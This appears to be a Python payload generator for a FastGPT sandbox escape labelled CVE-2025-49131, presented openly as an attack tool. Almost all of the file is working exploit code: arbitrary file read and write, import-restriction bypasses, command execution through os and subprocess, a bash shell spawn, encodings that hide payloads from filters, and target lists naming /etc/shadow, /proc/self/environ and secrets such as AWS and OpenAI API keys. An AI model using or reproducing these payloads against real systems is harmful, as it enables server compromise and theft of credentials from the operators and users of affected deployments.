"""
CVE-2025-49131 - FastGPT Sandbox Escape Payloads
=================================================
Collection of bypass payloads for Python sandbox escape
"""

class PayloadGenerator:
    """Generate sandbox escape payloads with various techniques"""
    
    @staticmethod
    def file_read_payloads(filepath: str) -> list:
        """Generate file read payloads"""
        return [
            # Basic file read
            f"open('{filepath}', 'r').read()",
            f"open('{filepath}').read()",
            
            # Builtins access
            f"__builtins__.open('{filepath}').read()",
            f"__builtins__['open']('{filepath}').read()",
            
            # Getattr method
            f"getattr(__builtins__, 'open')('{filepath}').read()",
            
            # Lambda wrapper
            f"(lambda f: open(f).read())('{filepath}')",
            
            # Exec/Compile
            f"exec(compile('result=open(\\\"{filepath}\\\").read()','','exec'))",
            
            # IO module
            f"__import__('io').open('{filepath}').read()",
            
            # Pathlib
            f"__import__('pathlib').Path('{filepath}').read_text()",
            
            # Codecs
            f"__import__('codecs').open('{filepath}', 'r', 'utf-8').read()",
        ]
    
    @staticmethod
    def file_write_payloads(filepath: str, content: str) -> list:
        """Generate file write payloads"""
        escaped = content.replace("'", "\\'")
        return [
            f"open('{filepath}', 'w').write('{escaped}')",
            f"__builtins__.open('{filepath}', 'w').write('{escaped}')",
            f"__import__('io').open('{filepath}', 'w').write('{escaped}')",
            f"__import__('pathlib').Path('{filepath}').write_text('{escaped}')",
        ]
    
    @staticmethod
    def import_bypass_payloads(module: str) -> list:
        """Generate import restriction bypass payloads"""
        return [
            # Direct __import__
            f"__import__('{module}')",
            
            # Builtins __import__
            f"__builtins__.__import__('{module}')",
            f"__builtins__['__import__']('{module}')",
            
            # Importlib
            f"__import__('importlib').import_module('{module}')",
            
            # Exec import
            f"exec('import {module}')",
            f"exec('import {module}; result = {module}')",
            
            # Compile and exec
            f"exec(compile('import {module}', '', 'exec'))",
            
            # Subclass walking (find catch_warnings which has access to modules)
            f"[x for x in ().__class__.__base__.__subclasses__() if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__']('{module}')",
            
            # Using __loader__
            f"__loader__.load_module('{module}')" if module else "",
        ]
    
    @staticmethod
    def rce_payloads(command: str) -> list:
        """Generate RCE payloads"""
        escaped = command.replace("'", "\\'")
        return [
            # os.system
            f"__import__('os').system('{escaped}')",
            
            # os.popen
            f"__import__('os').popen('{escaped}').read()",
            
            # subprocess.check_output
            f"__import__('subprocess').check_output('{escaped}', shell=True)",
            
            # subprocess.getoutput
            f"__import__('subprocess').getoutput('{escaped}')",
            
            # subprocess.run
            f"__import__('subprocess').run('{escaped}', shell=True, capture_output=True).stdout",
            
            # Platform/commands
            f"__import__('commands').getoutput('{escaped}')" if command else "",
            
            # pty spawn
            f"__import__('pty').spawn('/bin/bash')",
        ]
    
    @staticmethod
    def info_gathering_payloads() -> list:
        """Generate information gathering payloads"""
        return [
            # Environment variables
            "__import__('os').environ.copy()",
            "dict(__import__('os').environ)",
            
            # Current user
            "__import__('os').getuid()",
            "__import__('pwd').getpwuid(__import__('os').getuid())",
            
            # Current directory
            "__import__('os').getcwd()",
            
            # List directory
            "__import__('os').listdir('/')",
            "__import__('os').listdir('/home')",
            
            # Process info
            "__import__('os').getpid()",
            
            # System info
            "__import__('platform').platform()",
            "__import__('platform').uname()",
            
            # Network info
            "__import__('socket').gethostname()",
            "__import__('socket').getfqdn()",
        ]
    
    @staticmethod
    def obfuscate(payload: str, method: str = 'base64') -> str:
        """Obfuscate payload to bypass filters"""
        import base64
        
        if method == 'base64':
            encoded = base64.b64encode(payload.encode()).decode()
            return f"exec(__import__('base64').b64decode('{encoded}').decode())"
        
        elif method == 'hex':
            encoded = payload.encode().hex()
            return f"exec(bytes.fromhex('{encoded}').decode())"
        
        elif method == 'chr':
            chars = ','.join(str(ord(c)) for c in payload)
            return f"exec(''.join(chr(c) for c in [{chars}]))"
        
        elif method == 'rot13':
            import codecs
            encoded = codecs.encode(payload, 'rot13')
            return f"exec(__import__('codecs').decode('{encoded}', 'rot13'))"
        
        return payload
    
    @staticmethod
    def subclass_rce() -> str:
        """
        Generate RCE via subclass walking
        This finds a class that has access to os module
        """
        return """
# Find os._wrap_close which has access to os module
for i, cls in enumerate(().__class__.__base__.__subclasses__()):
    if cls.__name__ == '_wrap_close':
        # cls.__init__.__globals__['system']('id')
        print(f"Found {cls.__name__} at index {i}")
        print(cls.__init__.__globals__.keys())
        break
"""


# Payload collections for different scenarios
DETECTION_PAYLOADS = [
    "type(__builtins__)",
    "dir()",
    "globals().keys()",
    "__name__",
]

COMMON_TARGETS = [
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/proc/self/environ",
    "/proc/self/cmdline",
    "/home/.bashrc",
    "~/.bash_history",
    "/var/log/syslog",
]

SENSITIVE_ENV_VARS = [
    "DATABASE_URL",
    "DB_PASSWORD",
    "SECRET_KEY",
    "API_KEY",
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "MONGO_URI",
    "REDIS_URL",
    "OPENAI_API_KEY",
]
